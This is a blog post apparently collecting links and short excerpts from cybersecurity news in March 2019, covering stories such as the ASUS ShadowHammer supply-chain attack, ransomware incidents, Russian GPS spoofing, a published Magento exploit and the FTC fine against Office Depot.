This posting is here to collect cyber security news in March 2019.
I post links to security vulnerability news to comments of this article.
If you are interested in cyber security trends, read my Cyber security trends 2019 posting.
You are also free to post related links.
490 Comments
Tomi Engdahl says:
Hackers Are Loving PowerShell, Study Finds
https://www.securityweek.com/hackers-are-loving-powershell-study-finds
Threat Actors Prefer PowerShell over Other ATT&CK Techniques, Report Shows
PowerShell is by far the most prevalent MITRE ATT&CK technique, being detected twice as often as the next most common technique, says a new report from cybersecurity firm Red Canary.
Tomi Engdahl says:
Office Depot And OfficeMax Find Malware That Isn’t There
https://hackaday.com/2019/03/28/office-depot-and-officemax-find-malware-that-isnt-there/
Plenty of stores — including big box office stores such as Office Depot and OfficeMax — will be glad to help you.
The Federal Trade Commission (FTC) has fined Office Depot (who owns OfficeMax) $25 million and plans to use the funds to issue refunds. In addition, a vendor, Support.com, will pay $10 million to support the refunds.
The free check used software to detect problems on a PC. However, during the scan the user is asked if their computer has any of the following symptoms. For example, if their PC has become slow or frequently reboots. If you said yes to any of these questions, the software would produce a report claiming to have found evidence of malware and offering fixes that could cost significant amounts of money even if there was no other evidence.
Tomi Engdahl says:
Microsoft Retaliates Against APT35 Hacker Group by Seizing 99 Domains
https://www.bleepingcomputer.com/news/security/microsoft-retaliates-against-apt35-hacker-group-by-seizing-99-domains/
Tomi Engdahl says:
Bitcoin exchange DragonEx ‘hacked for undisclosed amount’
https://thenextweb.com/hardfork/2019/03/26/bitcoin-exchange-dragonex-hacked-for-undisclosed-amount/
Another day, another hack
Tomi Engdahl says:
Ransomware Behind Norsk Hydro Attack Takes On Wiper-Like Capabilities
https://threatpost.com/lockergoga-ransomware-norsk-hydro-wiper/143181/
Tomi Engdahl says:
Don’t change your Twitter birthday to 2007 unless you want to get kicked off for being under 13
You can’t actually unlock new color schemes!
https://www.theverge.com/tldr/2019/3/26/18282942/twitter-birthday-prank-2007-13-color-scheme
A viral prank trying to get people to change their Twitter birthdays to 2007 is getting users locked out of the platform for being under 13. The prank tweets tell users that changing the Twitter birthdays on their profiles will do everything from unlocking new color schemes, getting them admin privileges, or even a verified check. It gives me great pain to have to narc on a solid prank, but this won’t actually happen.
Tomi Engdahl says:
Russia Regularly Spoofs Regional GPS
https://www.darkreading.com/risk/russia-regularly-spoofs-regional-gps/d/d-id/1334262
The nation is a pioneer in spoofing and blocking satellite navigation signals, causing more than 9,800 incidents in the past three years, according to an analysis of navigational data.
Tomi Engdahl says:
Virus attacks Spain’s defense intranet, foreign state suspected: paper
https://www.reuters.com/article/us-spain-security-cyberattack/virus-attacks-spains-defense-intranet-foreign-state-suspected-paper-idUSKCN1R7115
Tomi Engdahl says:
Researchers Find Google Play Store Apps Were Actually Government Malware
https://motherboard.vice.com/en_us/article/43z93g/hackers-hid-android-malware-in-google-play-store-exodus-esurv
Security researchers have found a new kind of government malware that was hiding in plain sight within apps on Android’s Play Store. And they appear to have uncovered a case of lawful intercept gone wrong.
Tomi Engdahl says:
Office Depot Fined $25 Million For Scamming Customers With Bogus Malware Scans
https://amp.hothardware.com/news/office-depot-fined-scamming-customers-malware-scans
Tomi Engdahl says:
The FCC has fined robocallers $208 million. It’s collected $6,790.
https://www.foxnews.com/tech/the-fcc-has-fined-robocallers-208-million-its-collected-6790
Tomi Engdahl says:
Encryption law: time for tech industry to take the reins
https://itwire.com/open-sauce/86520-encryption-law-time-for-tech-industry-to-take-the-reins.html
a Sydney forum, organised under the name Safe Encryption Australia, outlining the negatives of the law.
Tomi Engdahl says:
Hackers dropped a secret backdoor in Asus’ update software
https://techcrunch.com/2019/03/25/asus-update-backdoor/
Tomi Engdahl says:
https://haxnology.com/top-5-ways-to-grow-hacking-skills/
Tomi Engdahl says:
Malware Installed in Asus Computers through Hacked Update Process
https://www.schneier.com/blog/archives/2019/03/malware_install.html
Kaspersky Labs is reporting on a new supply chain attack they call “Shadowhammer.”
Tomi Engdahl says:
Firefox launches Lockbox: The safest password manager for Android
https://www.technotification.com/2019/03/firefox-lockbox-password-manager-android.html
Tomi Engdahl says:
Releasing the NSA’s Previously Classified Tool ‘Ghidra’ For Free Is a ‘Game Changer’
https://motherboard.vice.com/en_us/article/panvm7/nsa-releases-ghidra-for-free-game-changer
The NSA release a free and open source reverse engineering app called ‘Ghidra.”
Tomi Engdahl says:
https://www.cnet.com/news/article-13-eu-approves-controversial-copyright-law/
Tomi Engdahl says:
We’re already in the middle of a major cyber war, experts believe
https://www.foxnews.com/tech/were-already-in-the-middle-of-a-major-cyberwar-experts-believe
A whopping 87 percent of information security specialists believe we’re in the middle of a global cyber war.
Tomi Engdahl says:
Growing Drone Industry Spawns a Growing Antidrone Industry
https://spectrum.ieee.org/aerospace/aviation/growing-drone-industry-spawns-a-growing-antidrone-industry
Tomi Engdahl says:
J-CODE Announces 61 Arrests in its Second Coordinated Law Enforcement Operation Targeting Opioid Trafficking on the Darknet
https://www.fbi.gov/news/pressrel/press-releases/j-code-announces-61-arrests-in-its-second-coordinated-law-enforcement-operation-targeting-opioid-trafficking-on-the-darknet?utm_campaign=email-Daily&utm_medium=email&utm_source=national-press-releases&utm_content=%5B721800%5D-%2Fnews%2Fpressrel%2Fpress-releases%2Fj-code-announces-61-arrests-in-its-second-coordinated-law-enforcement-operation-targeting-opioid-trafficking-on-the-darknet
Tomi Engdahl says:
Researcher finds new way to sniff Windows BitLocker encryption keys
https://nakedsecurity.sophos.com/2019/03/21/researcher-finds-new-way-to-sniff-windows-bitlocker-encryption-keys/
Tomi Engdahl says:
The Fragile State of U.K. Banking Sector IT Systems Continues Unabated
https://spectrum.ieee.org/riskfactor/computing/it/the-fragile-state-of-uk-banking-sector-it-systems-continues-unabated
Banking sector IT systems in the United Kingdom are in a very sorry state. A review of various media reports shows that in 2018, there were at least 44 bank and building-society-related IT operational or cybersecurity incidents that prevented customers from accessing their payment services.
Tomi Engdahl says:
How Russia tampers with GPS
https://www.axios.com/how-russia-tampers-with-gps-f43f91d9-fa0f-4a6d-a2a6-2857b5b4985e.html
Satellite navigation systems like the Global Positioning System (GPS) make so many different pieces of our global infrastructure tick that most countries treat their signals as sacrosanct, knowing that interfering with them could have devastating effects. But a new report released Tuesday is giving us the first broad view of a country — Russia — that’s pervasively tampering with the service.
Tomi Engdahl says:
FTC Crackdown Stops Operations Responsible for Billions of Illegal Robocalls
https://www.ftc.gov/news-events/press-releases/2019/03/ftc-crackdown-stops-operations-responsible-billions-illegal
Unwanted calls pitched auto warranties, debt-relief services, Google listings, and a fake charity
Tomi Engdahl says:
How medical devices like pacemakers and insulin pumps can be hacked
https://www.cbsnews.com/news/cybersecurity-researchers-show-medical-devices-hacking-vulnerabilities/
Tomi Engdahl says:
New Virus Steals Your Files Until PewDiePie Gets 100M Subscribers
https://futurism.com/ransomware-encrypts-files-pewdiepie
Another ransomware variant encrypts your files unless you subscribe to PewDiePie — but even if you do, it deletes them anyway.
Tomi Engdahl says:
Ransomware Forces Two Chemical Companies to Order ‘Hundreds of New Computers’
https://motherboard.vice.com/amp/en_us/article/8xyj7g/ransomware-forces-two-chemical-companies-to-order-hundreds-of-new-computers
Tomi Engdahl says:
20 years for swatter who got a man killed
https://techcrunch.com/2019/03/29/20-years-for-swatter-who-got-a-man-killed/
Tyler Barriss, a prolific and seemingly unremorseful repeat swatter and bomb hoaxer whose fakery got a man killed in 2017, has been sentenced to 20 years in prison. This hopefully closes the book on a long and disturbing career of random and mercenary harassment and threats.
Tomi Engdahl says:
Pentagon Warns Silicon Valley About Aiding Chinese Military
https://spectrum.ieee.org/tech-talk/aerospace/military/pentagon-warns-silicon-valley-about-aiding-chinese-military
Tomi Engdahl says:
Here’s the List of ~600 MAC Addresses Targeted in Recent ASUS Hack
https://thehackernews.com/2019/03/asus-hack-mac-addresses.html?m=1
Russian security firm Kaspersky last week didn’t release the full list all MAC addresses that hackers hardcoded into their malware to surgically target a specific pool of users.
offline tool and launched an online web page where ASUS PC users can search for their MAC addresses to check whether they were in the hit list.
ASUS Hack: Operation ShadowHammer
It was revealed last week that a group of state-sponsored hackers managed to hijack ASUS Live automatic software update server last year and pushed malicious updates to over one million Windows computers worldwide in order to infect them with backdoors.
Though the second stage malware was only pushed to nearly 600 targeted users, it doesn’t mean that millions of ASUS computers which received the malicious software update are not compromised
Tomi Engdahl says:
Hacker Rigs New Zealand Shooter’s Manifesto With Malware
https://uk.pcmag.com/news/120294/hacker-rigs-new-zealand-shooters-manifesto-with-malware
A hacker is responding to the New Zealand mosque shooting by booby-trapping the attacker’s manifesto with malware.
Tomi Engdahl says:
CNBC:
Researchers find totaled Teslas contain unencrypted and personally revealing data about owners, including locations visited, phone contacts, and dash cam video
Tesla cars keep more data than you think, including this video of a crash that totaled a Model 3
https://www.cnbc.com/2019/03/29/tesla-model-3-keeps-data-like-crash-videos-location-phone-contacts.html
Crashed Tesla vehicles, sold at junk yards and auctions, contain deeply personal and unencrypted data including info from drivers’ paired mobile devices, and video showing what happened just before the accident.
Security researcher GreenTheOnly extracted unencrypted video, phonebooks, calendar items and other data from Model S, Model X and Model 3 vehicles purchased for testing and research at salvage.
Hackers who test or modify the systems in their own Tesla vehicles are flagged internally, ensuring that they are not among the first to receive over-the-air software updates first.
Tomi Engdahl says:
Dan Goodin / Ars Technica:
A newly published exploit for a Magento vulnerability that can be used without authentication puts hundreds of thousands of e-commerce sites at risk
Brace yourselves: Exploit published for serious Magento bug allowing card skimming [Updated]
Magento admins: Beware of SQL flaw that requires no authentication.
https://arstechnica.com/information-technology/2019/03/severe-magento-bug-opens-300k-commerce-sites-to-card-skimming-attacks/
Tomi Engdahl says:
Gavin De Becker / The Daily Beast:
Jeff Bezos’ security chief says his investigation concluded with high confidence that Saudi Arabia “had access to Bezos’ phone, and gained private information” — The National Enquirer’s lawyer tried to get me to say there was no hacking.
Bezos Investigation Finds the Saudis Obtained His Private Data
https://www.thedailybeast.com/jeff-bezos-investigation-finds-the-saudis-obtained-his-private-information
The National Enquirer’s lawyer tried to get me to say there was no hacking.
“Our investigators and several experts concluded with high confidence that the Saudis had access to Bezos’ phone, and gained private information.”
Experts with whom we consulted confirmed New York Times reports on the Saudi capability to “collect vast amounts of previously inaccessible data from smartphones in the air without leaving a trace—including phone calls, texts, emails”—and confirmed that hacking was a key part of the Saudis’ “extensive surveillance efforts that ultimately led to the killing of [Washington Post] journalist Jamal Khashoggi.”
Some Americans will be surprised to learn that the Saudi government has been intent on harming Jeff Bezos since last October, when the Post began its relentless coverage of Khashoggi’s murder. The Saudi campaign against Bezos has already been reported by CNN International, Bloomberg, The Daily Beast, and others.
Saudi Arabia attacks people in many ways, obviously, including through their elaborate social media program that uses sophisticated technology and paid surrogates to create artificially trending hashtags
Tomi Engdahl says:
Mark Zuckerberg / Washington Post:
Mark Zuckerberg calls for global regulations in four areas: policing harmful content, election integrity, a GDPR-like privacy framework, and data portability — Mark Zuckerberg is founder and chief executive of Facebook. — Technology is a major part of our lives, and companies such as Facebook have immense responsibilities.
http://www.washingtonpost.com/opinions/mark-zuckerberg-the-internet-needs-new-rules-lets-start-in-these-four-areas/2019/03/29/9e6f0504-521a-11e9-a3f7-78b7525a8d5f_story.html
Tomi Engdahl says:
Alex W. Palmer / Wired:
A behind-the-scenes account of how a member of TripAdvisor’s anti-fraud team helped the FCC track down a Florida man accused of making 96M+ illegal robocalls — BRAD YOUNG, A lawyer at TripAdvisor, arrived at the company’s offices in Needham, Massachusetts, on October 12, 2015 …
https://www.wired.com/story/on-the-trail-of-the-robocall-king/
Tomi Engdahl says:
NSA-Inspired Vulnerability Found in Huawei Laptops
https://www.schneier.com/blog/archives/2019/03/nsa-inspired_vu.html
This is an interesting story of a serious vulnerability in a Huawei driver that Microsoft found. The vulnerability is similar in style to the NSA’s DOUBLEPULSAR that was leaked by the Shadow Brokers — believed to be the Russian government — and it’s obvious that this attack copied that technique.
Tomi Engdahl says:
Equifax, FICO launch Data Decision Cloud as credit scores meld with marketing, compliance, customer experience
https://www.zdnet.com/article/equifax-fico-launch-data-decision-cloud-as-credit-scores-meld-with-marketing-compliance-customer-experience/?ftag=COS-05-10aaa0g&utm_campaign=trueAnthem:+Trending+Content
By combining data pools and platforms, the companies hope to find more insights, build better predictive models and manage customer experiences better.
Tomi Engdahl says:
Huawei savaged by Brit code review board over pisspoor dev practices
HCSEC pulls no technical punches in annual report
https://www.theregister.co.uk/2019/03/28/hcsec_huawei_oversight_board_savaging_annual_report/
Britain’s Huawei oversight board has said the Chinese company is a threat to British national security after all – and some existing mobile network equipment will have to be ripped out and replaced to get rid of said threat.
“The work of HCSEC [Huawei Cyber Security Evaluation Centre]… reveals serious and systematic defects in Huawei’s software engineering and cyber security competence,” said the HCSEC oversight board in its annual report, published this morning.